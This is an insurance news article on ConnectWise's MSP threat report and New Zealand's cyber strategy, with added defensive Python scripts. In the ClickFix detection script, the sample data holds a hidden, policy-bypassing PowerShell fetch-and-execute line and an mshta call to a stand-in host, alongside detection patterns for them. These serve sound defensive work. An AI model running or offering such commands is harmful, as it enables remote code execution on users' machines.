Managed service provider pathways emerge as hub for cyber disruption

Analysis shows attackers abusing credentials, tools, and software dependencies

By Roxanne Libatique

Cyber attackers’ growing focus on trusted access paths through managed service providers (MSPs) and critical infrastructure is increasing the potential for correlated cyber, business interruption, and liability losses across multiple insureds.

Attackers shift focus to identity and trusted access

ConnectWise’s “2026 Managed Service Provider Threat Report,” based on activity observed in 2025, concludes that attackers are relying less on novel software vulnerabilities and more on abusing identity, remote access, and software supply chains within MSP-managed environments. The report identifies four key routes into MSP estates:

  • Identity abuse
  • Misuse of legitimate tools
  • Weaknesses in remote access infrastructure
  • Software supply chain compromise

Once inside an MSP, threat actors can use repeatable administrative practices and shared configurations to move across multiple customer environments. ConnectWise notes that artificial intelligence is being applied to speed up existing tactics rather than to introduce entirely new ones. Investigators are observing AI’s influence in more convincing phishing, more realistic fraud attempts, faster malware development cycles, and more efficient operations, even when AI tooling is not directly visible in telemetry. These patterns suggest that a single technology or service provider compromise could affect multiple policyholders at once.

Ransomware, VPNs and backup infrastructure under pressure

Ransomware remained a central operational risk for MSPs and their customers in 2025, with ConnectWise reporting heightened activity toward the end of the year. The analysis describes a “scan, steal, encrypt” pattern, in which attackers identify exposed assets, exfiltrate data, and then encrypt systems, often after first targeting backup infrastructure. By disrupting or corrupting backups early in an intrusion, ransomware operators can reduce recovery options and increase leverage during negotiations.

The report also notes attempts to circumvent one-time-password-based multi-factor authentication, including by exploiting VPN configuration artefacts and retained secrets on network appliances to regain access. Public-facing SSL VPN interfaces feature as a recurring initial access point. In several incidents, attackers moved from successful VPN authentication to full domain compromise within hours, reducing the time available for defenders to detect and contain activity. This compressed response window may drive higher incident costs, longer outages, and more severe claims.
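The VPN-to-domain-compromise window the report describes is something a defender can measure rather than only read about. The script below is an added example, not code from the ConnectWise report or from any VPN vendor: it pairs each privileged Active Directory event with the most recent successful VPN login by the same account inside a time window and reports the elapsed minutes, and it separately lists VPN logins that completed with no second factor. The two log formats are constructed key=value lines (not a real appliance or Windows export), the Windows event IDs are the real ones for privileged-group membership changes and privileged logons, and the sample accounts and addresses are invented.

```python
"""Time-to-privilege correlation between VPN logins and privileged AD events.

Added example, not code from the ConnectWise report. Both log formats below
are constructed key=value lines, not any vendor's real format, and the
accounts, hosts and addresses are invented for illustration.
"""
import shlex
from datetime import datetime, timedelta

# Constructed VPN appliance authentication log (not real telemetry).
VPN_LOG = [
    '2025-11-03T01:12:07Z vpn01 login user=jsmith src=203.0.113.10 mfa=otp result=success',
    '2025-11-03T01:13:44Z vpn01 login user=svc_backup src=198.51.100.7 mfa=none result=success',
    '2025-11-03T08:55:21Z vpn01 login user=aperez src=192.0.2.33 mfa=otp result=success',
    '2025-11-03T08:56:02Z vpn01 login user=aperez src=192.0.2.33 mfa=otp result=failure',
]

# Constructed domain-controller security events. The event IDs are real:
# 4728/4732/4756 = member added to a security-enabled group,
# 4672 = special privileges assigned to a new logon.
AD_LOG = [
    '2025-11-03T02:40:19Z dc01 eventid=4728 subject=svc_backup target="Domain Admins" member=svc_backup',
    '2025-11-03T03:05:02Z dc01 eventid=4672 subject=svc_backup',
    '2025-11-03T09:30:00Z dc01 eventid=4672 subject=da-aperez',
]

PRIVILEGED_EVENT_IDS = {"4672", "4728", "4732", "4756"}


def parse_event(line):
    """Parse 'TIMESTAMP HOST [ACTION] key=value ...' into a dict.
    shlex keeps quoted values such as target="Domain Admins" together."""
    tokens = shlex.split(line)
    event = {
        "ts": datetime.strptime(tokens[0], "%Y-%m-%dT%H:%M:%SZ"),
        "host": tokens[1],
    }
    for token in tokens[2:]:
        if "=" in token:
            key, value = token.split("=", 1)
            event[key] = value
    return event


def successful_vpn_logins(vpn_lines):
    return [e for e in (parse_event(l) for l in vpn_lines) if e.get("result") == "success"]


def logins_without_mfa(vpn_lines):
    """Accounts that reached the VPN with a password only (no second factor)."""
    return sorted({e["user"] for e in successful_vpn_logins(vpn_lines) if e.get("mfa") == "none"})


def correlate(vpn_lines, ad_lines, window_hours=6):
    """Pair each privileged AD event with the latest preceding VPN login by the
    same account inside the window and report how many minutes elapsed."""
    logins = successful_vpn_logins(vpn_lines)
    window = timedelta(hours=window_hours)
    findings = []
    for line in ad_lines:
        ev = parse_event(line)
        if ev.get("eventid") not in PRIVILEGED_EVENT_IDS:
            continue
        candidates = [
            l for l in logins
            if l["user"] == ev.get("subject") and l["ts"] <= ev["ts"] <= l["ts"] + window
        ]
        if not candidates:
            continue
        login = max(candidates, key=lambda l: l["ts"])
        findings.append({
            "user": ev["subject"],
            "src": login["src"],
            "mfa": login["mfa"],
            "event_id": ev["eventid"],
            "minutes": (ev["ts"] - login["ts"]).total_seconds() / 60,
        })
    return findings


if __name__ == "__main__":
    for f in correlate(VPN_LOG, AD_LOG):
        print(f"{f['user']} from {f['src']} (mfa={f['mfa']}): event {f['event_id']} "
              f"{f['minutes']:.0f} min after VPN login")
    print("no-MFA VPN logins:", logins_without_mfa(VPN_LOG))
```

On the constructed data the service account that logged in without a second factor is added to Domain Admins about 87 minutes after its VPN login, which is the kind of compressed window the report describes; the separate da-aperez privileged logon has no matching VPN login because the admin account is distinct from the VPN identity, which is the intended outcome of keeping standing admin accounts off the VPN. The six-hour window and the assumption that the VPN username equals the AD subject are both parameters to tune per estate.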

Software supply chain and user-assisted execution risks grow

ConnectWise also highlights a rise in software supply chain compromise, including campaigns that target maintainers of open source packages. In the “Shai-Hulud” example, compromised npm maintainer accounts were used to push trojanised updates to downstream environments. Similar techniques have been observed against other package registries, including PyPI, NuGet, RubyGems, and Rust’s crates.io. Because MSPs and their customers often use automated and standardised deployment patterns across many tenants, a single tainted update can propagate widely, creating correlated exposure for insurers with multiple insureds using the same technology stacks or vendors.
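Three lockfile-level checks limit how far a trojanised update can propagate through automated deployments: every dependency must carry an integrity hash, must resolve from the registry you expect, and must be old enough that a hijacked maintainer account would likely have been noticed before your pipeline pulled it. The script below is an added example, not code from the ConnectWise report or from npm: it audits a package-lock.json (lockfileVersion 2/3 “packages” map) against per-version publish dates. The lockfile contents, package names and publish dates are all constructed and hypothetical; the shape of the publish-date map follows the `time` object the npm registry returns (obtainable with `npm view <pkg> time --json`), and the sha512 values are placeholders, not real hashes.

```python
"""Audit an npm lockfile for unpinned, fresh, or off-registry dependencies.

Added example, not code from the ConnectWise report or from npm. Package
names, lockfile contents and publish dates are constructed; the sha512
values are placeholders. Only lockfileVersion 2/3 ("packages") is handled.
"""
from datetime import datetime, timedelta
from urllib.parse import urlparse

EXPECTED_REGISTRY_HOST = "registry.npmjs.org"

# Constructed package-lock.json content (hypothetical packages).
LOCKFILE = {
    "name": "tenant-deploy",
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "tenant-deploy", "dependencies": {"acme-utils": "^1.4.0"}},
        "node_modules/acme-utils": {
            "version": "1.4.2",
            "resolved": "https://registry.npmjs.org/acme-utils/-/acme-utils-1.4.2.tgz",
            "integrity": "sha512-PLACEHOLDER-A",
        },
        "node_modules/acme-widget": {
            "version": "2.9.0",
            "resolved": "https://registry.npmjs.org/acme-widget/-/acme-widget-2.9.0.tgz",
            "integrity": "sha512-PLACEHOLDER-B",
        },
        "node_modules/acme-legacy": {  # no integrity field at all
            "version": "0.3.1",
            "resolved": "https://registry.npmjs.org/acme-legacy/-/acme-legacy-0.3.1.tgz",
        },
        "node_modules/acme-mirror": {  # resolved from a host that is not the registry
            "version": "5.0.0",
            "resolved": "https://mirror.example.invalid/acme-mirror/-/acme-mirror-5.0.0.tgz",
            "integrity": "sha512-PLACEHOLDER-C",
        },
    },
}

# Constructed publish timestamps, shaped like the registry's per-package "time" map.
REGISTRY_TIMES = {
    "acme-utils": {"1.4.2": "2025-06-10T12:00:00Z"},
    "acme-widget": {"2.9.0": "2025-11-02T19:45:00Z"},  # pushed the day before the audit
    "acme-legacy": {"0.3.1": "2024-01-15T08:00:00Z"},
    "acme-mirror": {"5.0.0": "2025-03-01T00:00:00Z"},
}

# Fixed "now" so the example is deterministic.
NOW = datetime(2025, 11, 3, 9, 0, 0)


def audit_lockfile(lock, registry_times, now=NOW, min_age_days=7):
    """Return (package, reason) findings for each dependency that fails a check."""
    findings = []
    for path, meta in lock.get("packages", {}).items():
        if path == "":  # the root project entry, not a dependency
            continue
        name = path.rsplit("node_modules/", 1)[-1]
        version = meta.get("version")

        # 1. Every dependency must be pinned to content, not just to a version.
        if not meta.get("integrity"):
            findings.append((name, "missing integrity hash"))

        # 2. The tarball must come from the registry the organisation trusts.
        host = urlparse(meta.get("resolved", "")).hostname
        if host != EXPECTED_REGISTRY_HOST:
            findings.append((name, f"resolved from unexpected host {host}"))

        # 3. A freshly published version gets a quarantine period before deployment.
        published = registry_times.get(name, {}).get(version)
        if published is None:
            findings.append((name, f"no publish date for {version}"))
        else:
            age = now - datetime.strptime(published, "%Y-%m-%dT%H:%M:%SZ")
            if age < timedelta(days=min_age_days):
                findings.append((name, f"version {version} published {age.days} day(s) ago"))
    return findings


if __name__ == "__main__":
    for package, reason in audit_lockfile(LOCKFILE, REGISTRY_TIMES):
        print(f"{package}: {reason}")
```

The minimum-age check is the one that speaks most directly to a hijacked-maintainer worm: a version pushed hours ago by a compromised account is exactly what a nightly `npm install` across many tenants would pick up. Run with `min_age_days=0` the fresh-version finding disappears and only the integrity and registry-host findings remain, which is the trade-off between patch latency and quarantine that each MSP has to set deliberately.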

The report further describes “ClickFix” and related social engineering tactics, where users are persuaded to copy and paste attacker-provided commands into legitimate system utilities such as the Windows Run dialog or a PowerShell prompt. This shifts execution to the user and can bypass technical controls that focus on detecting automated malware delivery. Patrick Beggs, chief information security officer at ConnectWise, said attackers are reframing how they leverage trust in digital environments. “The defining theme of 2025 was the abuse of trust,” Beggs said, as reported by Security Brief New Zealand. He added that attackers are “exploiting valid credentials, misconfigured VPNs, trusted updates, and even user behaviour to gain access to systems and data,” and that for MSPs, “identity security, privileged access governance, and early behavioural detection must be foundational.”
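Because the user, not a dropper, launches the command, ClickFix activity shows up as process lineage rather than as a file: an interactive parent (Explorer, a browser) spawning a scripting host whose command line downloads and executes remote content, hides its window, bypasses execution policy, or still carries the lure text the victim pasted along with it. The detection below is an added example, not code from the ConnectWise report or any EDR product: it scores constructed process-creation events against those indicators and flags any event matching at least two. The field names are a simplification of Sysmon/EDR process-creation data, the events and hostnames are invented, and the indicator list is a starting point rather than a complete rule set.

```python
"""Flag ClickFix-style executions from process-creation events.

Added example, not code from the ConnectWise report. The events below are
constructed; "parent", "image" and "cmdline" are a simplification of the
fields a Sysmon event 1 or EDR process-creation record would carry.
"""
import re

INTERACTIVE_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe"}
USER_EXEC_IMAGES = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                    "wscript.exe", "cscript.exe", "curl.exe"}

# Command-line markers commonly pasted in ClickFix lures; each is one indicator.
INDICATORS = [
    ("download_and_execute",
     re.compile(r"(irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring)[^|]*\|\s*(iex|invoke-expression)", re.I)),
    ("encoded_command", re.compile(r"-(enc|encodedcommand|e)\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("hidden_window", re.compile(r"-w(indowstyle)?\s+hidden", re.I)),
    ("policy_bypass", re.compile(r"-e(xecutionpolicy|p)\s+bypass", re.I)),
    ("mshta_remote", re.compile(r"mshta(\.exe)?\s+(https?:|vbscript:|javascript:)", re.I)),
    # The lure often leaves a fake "verification" comment on the pasted line.
    ("captcha_lure_text", re.compile(r"not a robot|verification id|captcha", re.I)),
]

# Constructed process-creation events (hostnames use the reserved .invalid TLD).
EVENTS = [
    {"id": 1, "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": 'powershell -w hidden -ep bypass -c "irm https://cdn.example.invalid/v.txt | iex" '
                '# I am not a robot - Verification ID: 4821'},
    {"id": 2, "parent": "explorer.exe", "image": "mshta.exe",
     "cmdline": "mshta https://cdn.example.invalid/check.hta"},
    {"id": 3, "parent": "code.exe", "image": "powershell.exe",
     "cmdline": "powershell -NoProfile -File .\\build.ps1"},  # developer build, benign
    {"id": 4, "parent": "explorer.exe", "image": "cmd.exe",
     "cmdline": "cmd /c ipconfig /all"},  # user ran a shell, nothing else suspicious
]


def indicators_for(event):
    """List every indicator an event matches: lineage first, then command-line markers."""
    hits = []
    if event["parent"].lower() in INTERACTIVE_PARENTS and event["image"].lower() in USER_EXEC_IMAGES:
        hits.append("shell_from_interactive_parent")
    for name, pattern in INDICATORS:
        if pattern.search(event["cmdline"]):
            hits.append(name)
    return hits


def detect(events, min_indicators=2):
    """Return (event id, indicators) for events that match at least min_indicators.
    A single indicator (e.g. a user opening cmd from Explorer) is too common to alert on."""
    flagged = []
    for event in events:
        hits = indicators_for(event)
        if len(hits) >= min_indicators:
            flagged.append((event["id"], hits))
    return flagged


if __name__ == "__main__":
    for event_id, hits in detect(EVENTS):
        print(f"event {event_id}: {', '.join(hits)}")
```

Events 1 and 2 are flagged; the developer build (3) matches nothing and the bare cmd launch (4) carries only the lineage indicator and stays below the threshold. Two caveats a practitioner will want: a command pasted into Windows Terminal has WindowsTerminal.exe rather than explorer.exe as the parent, so the interactive-parent set needs extending per environment, and the Run dialog keeps its own history under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, which is worth collecting during response to recover exactly what the user pasted.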

New Zealand reforms seek minimum standards for critical infrastructure

Alongside these MSP-focused trends, New Zealand’s Government Communications Security Bureau (GCSB) has warned that cyber resilience across parts of the country’s critical infrastructure is only just meeting basic expectations. “Unfortunately, there are... pockets, including in our critical infrastructure, where that cybersecurity is barely meeting that foundational level that we would expect,” GCSB director-general Andrew Clark told MPs at a select committee, as reported by RNZ.

Clark said a tool counting cyber threats to New Zealand had recently “clicked over one billion,” and pointed to supply chains – including digital connections from private vendors into public agencies – as a growing point of weakness. The government has released a new cybersecurity strategy and action plan, replacing a 2019 strategy that preceded the rise of generative AI tools such as ChatGPT. The new framework prioritises the protection of “critical infrastructure,” with an initial consultation asking which sectors and services should fall under that definition and what level of cyber defence they should meet. Examples under consideration range from power and telecommunications to health services and financial systems.

Regulatory expectations and insurance market impact

Law firm Russell McVeagh has assessed that the strategy will likely have “significant governance implications for organisations,” noting that it sets clearer expectations for boards and management on cyber risk management and the protection of personal information. The firm also points to the prospect of regulation designed to “better incentivise the protection of personal information.” Clark told MPs that many smaller firms may not be classified as critical infrastructure but still hold sensitive data needing protection. He described “a missing piece” as the right incentive structure for such organisations to invest in appropriate security.

Both the ConnectWise findings and the government’s reform agenda indicate a closer connection between cyber controls, supply chain governance, and insurability. Key considerations for underwriters and brokers include:

  • Assessing MSP reliance and concentration across portfolios, especially where multiple insureds share providers or platforms
  • Evaluating critical infrastructure and supply chain exposures in cyber, professional indemnity, and business interruption wordings
  • Tracking emerging regulatory baselines that may influence minimum-security control requirements, incident response obligations, and claims outcomes

The developments point to a need for closer alignment between cyber risk assessment, vendor oversight, and policy design. As attackers continue to exploit trusted access, software dependencies, and gaps in basic controls, and as policymakers move toward more prescriptive expectations for critical and data‑rich sectors, carriers and intermediaries will need to test how well their underwriting, aggregation monitoring, and incident response arrangements reflect the realities of MSP‑driven and infrastructure-level exposure.